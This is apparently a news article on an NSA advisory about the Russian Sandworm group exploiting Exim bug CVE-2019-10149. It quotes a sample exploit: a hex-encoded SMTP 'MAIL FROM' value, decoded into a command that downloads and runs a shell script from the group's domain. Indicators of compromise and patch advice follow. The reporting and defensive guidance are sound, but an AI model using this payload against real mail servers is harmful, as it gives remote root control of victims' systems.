Stylized photo of desktop computer.

A Russian hacking group tied to power-grid attacks in Ukraine, the world’s most destructive data wiper worm, and other nefarious Kremlin operations is exploiting a vulnerability that allows it to take control of computers operated by the US government and its partners.

In an advisory published on Thursday, the US National Security Agency said that the Sandworm group was actively exploiting a vulnerability in Exim, an open source mail transfer agent, or MTA, for Unix-based operating systems. Tracked as CVE-2019-10149, the critical bug makes it possible for an unauthenticated remote attacker to send specially crafted emails that execute commands with root privileges. With that, the attacker can install programs of their choosing, modify data, and create new accounts.

A patch CVE-2019-10149 has been available since last June. The attacks have been active since at least August. NSA officials wrote:

The actors exploited victims using Exim software on their public facing MTAs by sending a command in the “MAIL FROM” field of an SMTP (Simple Mail Transfer Protocol) message. Below is a sample, which contains parameters the actor would modify per deployment.

MAILFROM:<${run{x2Fbinx2Fshtctx22execx20x2Fusrx2Fbinx2Fwgetx20x2DOx20x2Dx20http:x2Fx2Fhostapp.bex2Fscript1.shx20x7C x20bashx22}}@hostapp.be>
Hex decoded command:
/bin/sh -c "exec /usr/bin/wget -O - http://hostapp.be/script1.sh | bash"

Figure 1: Sample “MAIL FROM” exploitation command

When CVE-2019-10149 is successfully exploited, an actor is able to execute code of their choosing. When Sandworm exploited CVE-2019-10149, the victim machine would subsequently download and execute a shell script from a Sandworm-controlled domain. This script would attempt to do the following on the victim machine: add privileged users disable network security settings update SSH configurations to enable additional remote access execute an additional script to enable follow-on exploitation.

Thursday’s advisory said the hackers worked for a specific unit, known as the Main Center for Special Technologies, that’s within the GRU, or Russia’s Main Intelligence Directorate. There is general agreement among security researchers that the hacking group working on behalf of this unit has been responsible for some of the most ambitious and destructive cyberattacks in recent years.

Examples include:

Wired journalist Andy Greenberg recently published Sandworm, a book that chronicles the hacks and the geopolitical tensions they exploit.

The Exim mail-server bug came to light last June, at the same time that developers published a security patch. The advisory said that remote attacks generally required that vulnerable systems no longer run with default settings. In one case, though, remote attacks were possible against default systems when an attacker kept a connection to the vulnerable server open for seven days by transmitting one byte every few minutes.

Thursday’s advisory didn’t say how many servers have been targeted successfully or the geographies or industries they’re in. Even so, the NSA typically doesn’t issue these kinds of warnings unless there’s reason for concern.

People responsible for Exim servers should check that they’re running version 4.92 or higher. And out of an abundance of caution, administrators should also check system logs for connections to 95.216.13.196, 103.94.157.5, and hostapp.be, which are all connected to the ongoing Sandworm campaign.